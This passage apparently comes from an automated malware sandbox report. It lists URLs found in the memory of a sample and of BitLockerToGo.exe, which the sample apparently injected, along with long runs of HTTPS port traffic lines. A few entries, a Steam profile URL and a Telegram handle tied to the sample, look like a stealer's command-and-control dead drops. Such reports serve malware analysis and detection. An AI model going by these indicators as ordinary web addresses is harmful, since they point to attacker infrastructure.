                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://sb.scorecardresearch.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://srtb.msn.cn/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://srtb.msn.com/
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037
                  Source: BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199825403037oomaino5Mozilla/5.0
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000003.1850814860.000000000AC3C000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/b4cha00
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://tidal.com/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://twitter.com/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                  Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://vibe.naver.com/today
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://web.telegram.org/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://web.whatsapp.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                  Source: chromecache_477.9.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.deezer.com/
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                  Source: content.js.12.dr, content_new.js.12.drString found in binary or memory: https://www.google.com/chrome
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: chrome.exe, 00000007.00000003.1991904976.00005AF0014F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991793893.00005AF0014E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991848726.00005AF0014E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                  Source: chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                  Source: chromecache_477.9.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
                  Source: chromecache_477.9.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                  Source: chrome.exe, 00000007.00000003.1988831473.00005AF000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 00000007.00000003.1994157926.00005AF0010E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1991641140.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994699586.00005AF00151C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994201083.00005AF001484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994325942.00005AF001454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1994290879.00005AF001360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp
                  Source: chrome.exe, 00000007.00000003.1994237299.00005AF001470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.iheart.com/podcast/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.instagram.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.last.fm/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.messenger.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: BitLockerToGo.exe, 00000003.00000002.2659016940.0000000005C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.office.com
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://www.youtube.com
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                  Source: chrome.exe, 00000007.00000003.2005855727.00005AF000CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://y.music.163.com/m/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
